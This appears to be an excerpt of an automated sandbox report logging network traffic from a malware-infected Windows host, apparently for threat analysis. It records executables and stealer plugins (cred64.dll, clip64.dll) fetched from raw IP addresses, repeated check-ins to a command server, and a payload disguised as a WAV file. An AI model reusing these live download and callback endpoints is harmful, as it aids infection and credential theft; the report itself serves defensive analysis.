                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Host: fbsbx.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: image/gif
                                                                                              reporting-endpoints:
                                                                                              content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Pragma: private
                                                                                              Cache-Control: private
                                                                                              Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: DENY
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                              X-FB-Debug: fAdRUubYz/Jd4SwLR6A70be/+viiF11mJNVjM+McTwTdpy30dEJqm2HueFqgruQsaYN7fnsPS10NGVR2mru9dw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://5.42.65.80/newrock.exe
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              5.42.65.80:80
                                                                                              Request
                                                                                              GET /newrock.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 5.42.65.80
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Tue, 24 Oct 2023 12:46:40 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 20911616
                                                                                              Last-Modified: Tue, 24 Oct 2023 10:47:37 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "6537a0c9-13f1600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1704367747&timestamp=1698151599596
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.206:443
                                                                                              Request
                                                                                              GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1704367747&timestamp=1698151599596 HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.youtube.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Frame-Options: ALLOW-FROM https://accounts.google.com
                                                                                              Content-Security-Policy: frame-ancestors https://accounts.google.com
                                                                                              Content-Security-Policy: script-src 'nonce-DMPQipUfKYhMv8NJ1PsF8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:41 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 859
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:51 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 601
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:47:11 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 371
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:47:12 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://kjxccmvvoq.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 222
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://boivk.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 229
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://kehtyjt.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 263
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://qekjvi.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 364
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ymdhkamj.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 179
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://upakxwacfv.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 169
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:05 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 39
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://mirvo.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 321
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:06 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=94
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://engdryqes.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 127
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:06 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=93
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://wktiskl.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 175
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:06 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://xxpahisg.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 266
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:07 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://wqkmcyb.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 279
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:08 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://yyiycyyxsy.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 278
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:09 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ixkyveini.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 300
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:09 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=88
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://plfkmajgal.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 294
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:11 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 38
                                                                                              Keep-Alive: timeout=5, max=87
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://81.161.229.93/ca.exe
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              81.161.229.93:80
                                                                                              Request
                                                                                              GET /ca.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 81.161.229.93
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:06 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Tue, 24 Oct 2023 12:00:06 GMT
                                                                                              ETag: "78c48-60875146698b5"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 494664
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-bg
                                                                                              GET
                                                                                              http://171.22.28.213/1.exe
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              171.22.28.213:80
                                                                                              Request
                                                                                              GET /1.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 171.22.28.213
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:12 GMT
                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                              Last-Modified: Tue, 24 Oct 2023 12:37:02 GMT
                                                                                              ETag: "a9f200-60875987dfd03"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 11137536
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-fi
                                                                                              GET
                                                                                              http://77.91.124.1/theme/Plugins/cred64.dll
                                                                                              explothe.exe
                                                                                              Remote address:
                                                                                              77.91.124.1:80
                                                                                              Request
                                                                                              GET /theme/Plugins/cred64.dll HTTP/1.1
                                                                                              Host: 77.91.124.1
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:15 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 273
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                            • flag-fi
                                                                                              GET
                                                                                              http://77.91.124.1/theme/Plugins/clip64.dll
                                                                                              explothe.exe
                                                                                              Remote address:
                                                                                              77.91.124.1:80
                                                                                              Request
                                                                                              GET /theme/Plugins/clip64.dll HTTP/1.1
                                                                                              Host: 77.91.124.1
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:15 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
                                                                                              ETag: "16400-60691507c5cc0"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 91136
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-us
                                                                                              DNS
                                                                                              iplogger.com
                                                                                              K.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              iplogger.com
                                                                                              IN A
                                                                                              Response
                                                                                              iplogger.com
                                                                                              IN A
                                                                                              148.251.234.93
                                                                                            • flag-us
                                                                                              GET
                                                                                              http://45.61.160.199/spps/Mpvrwbardbq.wav
                                                                                              whiterapid.exe
                                                                                              Remote address:
                                                                                              45.61.160.199:80
                                                                                              Request
                                                                                              GET /spps/Mpvrwbardbq.wav HTTP/1.1
                                                                                              Host: 45.61.160.199
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:47:24 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Mon, 23 Oct 2023 12:35:13 GMT
                                                                                              ETag: "218836-60861741a6240"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2197558
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: audio/x-wav
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://kfnacivwa.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 327
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:47:33 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=100
